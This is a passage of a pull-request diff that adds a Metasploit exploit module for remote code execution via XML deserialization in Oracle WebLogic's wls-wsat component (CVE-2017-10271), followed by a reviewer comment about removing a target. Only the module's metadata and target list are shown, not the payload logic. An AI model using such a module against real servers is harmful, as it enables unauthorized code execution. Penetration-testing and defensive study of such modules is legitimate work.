modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb

```diff
@@ -0,0 +1,161 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Oracle WebLogic wls-wsat Component Deserialization RCE',
+        'Description'    => %q(
+            The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization
+        remote code execution vulnerability. Supported versions that are affected are
+        10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => ['d3c3pt10n <d3c3pt10n[AT]deceiveyour.team>'],
+        'References'     =>
+          [
+            [ 'URL', 'http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html'],
+            [ 'CVE', '2017-10271']
+          ],
+        'Platform'      => %w{ win linux unix },
+        'Arch'          => [ ARCH_CMD ],
+        'Targets'        =>
+          [
+            [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],
+            [ 'Unix Command payload', { 'Arch' => [ARCH_CMD], Platform => 'unix' } ],
+            [ 'Linux Command payload', { 'Arch' => [ARCH_CMD], Platform => 'linux' } ]
```

Comment:
You can remove this target because of https://github.com/rapid7/metasploit-framework/pull/9379/files#r160017522.